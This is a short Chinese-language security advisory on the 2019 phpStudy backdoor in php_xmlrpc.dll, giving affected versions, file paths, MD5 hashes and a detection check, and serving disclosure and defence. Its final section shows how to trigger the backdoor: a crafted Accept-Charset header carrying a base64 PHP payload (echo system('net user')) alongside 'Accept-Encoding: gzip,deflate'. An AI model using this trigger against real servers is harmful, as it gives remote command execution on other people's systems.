Phpstudy隐藏后门2019-09-24

1.事件背景

Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包，通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款软件一次性安装，无需配置即可直接安装使用，具有PHP环境调试和PHP开发功能，在国内有着近百万PHP语言学习者、开发者用户

9月20日杭州公安微信公众账号发布了“杭州警方通报打击涉网违法犯罪暨“净网2019”专项行动战果”的文章，文章里说明phpstudy存在“后门”

2.影响版本

软件作者声明phpstudy 2016版PHP5.4存在后门。

实际测试官网下载phpstudy2018版php-5.2.17和php-5.4.45也同样存在后门

3.后门检测方法

通过分析，后门代码存在于\ext\php_xmlrpc.dll模块中

phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45

phpStudy2016

路径

php\php-5.2.17\ext\php_xmlrpc.dll

php\php-5.4.45\ext\php_xmlrpc.dll

phpStudy2018

路径

PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll

PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dl

用记事本打开此文件查找@eval，文件存在@eval(%s(‘%s’))证明漏洞存在

附后门文件MD5值：

MD5: 0F7AD38E7A9857523DFBCE4BCE43A9E9

MD5: C339482FD2B233FB0A555B629C0EA5D5

4. 后门利用手法

 将含有后门的phpstudy 运行起来 然后访问网站

访问目标站点

抓取访问包 修改请求包内容 直接触发远程命令执行

Accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7

Accept-Encoding: gzip,deflate

ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7 base64加密的 解密后  echo system("net user");

添加 远程命令 触发后门